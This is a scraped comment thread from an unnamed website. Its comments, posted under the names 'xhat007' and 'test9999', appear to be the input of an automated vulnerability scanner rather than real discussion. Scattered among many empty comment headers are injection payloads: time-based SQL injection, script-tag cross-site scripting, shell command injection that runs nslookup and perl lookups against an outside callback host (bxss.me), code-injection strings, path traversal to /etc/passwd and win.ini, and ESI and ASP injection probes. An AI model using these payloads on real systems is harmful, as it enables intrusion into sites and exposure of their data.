xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
e'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
xhat007 (1) - 3 years ago - Reply 0
RvIIAFJA')) OR 227=(SELECT 227 FROM PG_SLEEP(15))--
xhat007 (1) - 3 years ago - Reply 0
3CJgANMX') OR 410=(SELECT 410 FROM PG_SLEEP(15))--
xhat007 (1) - 3 years ago - Reply 0
o9mrHE3t' OR 498=(SELECT 498 FROM PG_SLEEP(15))--
xhat007 (1) - 3 years ago - Reply 0
ZiX1o5sJ'; waitfor delay '0:0:15' --
xhat007 (1) - 3 years ago - Reply 0
1 waitfor delay '0:0:15' --
xhat007 (1) - 3 years ago - Reply 0
(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+" /
xhat007 (1) - 3 years ago - Reply 0
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
xhat007 (1) - 3 years ago - Reply 0
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
xhat007 (1) - 3 years ago - Reply 0
if(now()=sysdate(),sleep(15),0)
xhat007 (1) - 3 years ago - Reply 0
-1" OR 2+363-363-1=0+0+0+1 --
xhat007 (1) - 3 years ago - Reply 0
-1 OR 2+557-557-1=0+0+0+1 --
xhat007 (1) - 3 years ago - Reply 0
-1 OR 2+275-275-1=0+0+0+1
xhat007 (1) - 3 years ago - Reply 0
-1' OR 2+653-653-1=0+0+0+1 --
xhat007 (1) - 3 years ago - Reply 0
-1' OR 2+189-189-1=0+0+0+1 or 'kumlMi2B'='
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
'"()&%<acx><ScRiPt >cD3s(9743)</ScRiPt>
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
e'"()&%<acx><ScRiPt >cD3s(9471)</ScRiPt>
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
"+"A".concat(70-3).concat(22*4).concat(114).concat(87).concat(115).concat(74)+(require"socket"
Socket.gethostbyname("hitfc"+"upqlmxmu84e51.bxss.me.")[3].to_s)+"
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
'+'A'.concat(70-3).concat(22*4).concat(121).concat(71).concat(112).concat(89)+(require'socket'
Socket.gethostbyname('hitbt'+'ffntyhmzc3c1b.bxss.me.')[3].to_s)+'
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
HttP://bxss.me/t/xss.html?%00
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
http://bxss.me/t/fit.txt?.jpg
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
'.gethostbyname(lc('hitnp'.'phskoijbb77fd.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(86).chr(99).chr(71).'
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
".gethostbyname(lc("hitkj"."zrguleqf00c22.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(85).chr(121).chr(90)."
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
1some_inexistent_file_with_long_name .jpg
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
&echo odykee$()\ nnkzio\nz^xyu||a #' &echo odykee$()\ nnkzio\nz^xyu||a #|" &echo odykee$()\ nnkzio\nz^xyu||a #
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
|echo jlkaxc$()\ hcxigh\nz^xyu||a #' |echo jlkaxc$()\ hcxigh\nz^xyu||a #|" |echo jlkaxc$()\ hcxigh\nz^xyu||a #
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
(nslookup hitkhxhwggpji4f155.bxss.me||perl -e "gethostbyname('hitkhxhwggpji4f155.bxss.me')")
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
$(nslookup hithikytlxana2c31d.bxss.me||perl -e "gethostbyname('hithikytlxana2c31d.bxss.me')")
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
&(nslookup hithlnfuxufcj556ff.bxss.me||perl -e "gethostbyname('hithlnfuxufcj556ff.bxss.me')")&'\"
0&(nslookup hithlnfuxufcj556ff.bxss.me||perl -e "gethostbyname('hithlnfuxufcj556ff.bxss.me')")&
'
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
|(nslookup hitbbqxwyjxcfc5a76.bxss.me||perl -e "gethostbyname('hitbbqxwyjxcfc5a76.bxss.me')")
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
(nslookup hitxdyfjpdwdufd598.bxss.me||perl -e "gethostbyname('hitxdyfjpdwdufd598.bxss.me')")
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
;(nslookup hitegevdozdfif282d.bxss.me||perl -e "gethostbyname('hitegevdozdfif282d.bxss.me')")|(nslookup hitegevdozdfif282d.bxss.me||perl -e "gethostbyname('hitegevdozdfif282d.bxss.me')")&(nslookup hitegevdozdfif282d.bxss.me||perl -e "gethostbyname('hitegevdozdfif282d.bxss.me')")
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
echo hmfudp$()\ otoeai\nz^xyu||a #' &echo hmfudp$()\ otoeai\nz^xyu||a #|" &echo hmfudp$()\ otoeai\nz^xyu||a #
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
test9999 () - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
../../../../../../../../../../../../../../windows/win.ini
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
../../../../../../../../../../../../../../etc/passwd
xhat007 (1) - 3 years ago - Reply 0
e<esi:include src="http://bxss.me/rpb.png"/>
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
response.write(9000231*9678226)
xhat007 (1) - 3 years ago - Reply 0
'+response.write(9000231*9678226)+'
xhat007 (1) - 3 years ago - Reply 0
"+response.write(9000231*9678226)+"
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0
xhat007 (1) - 3 years ago - Reply 0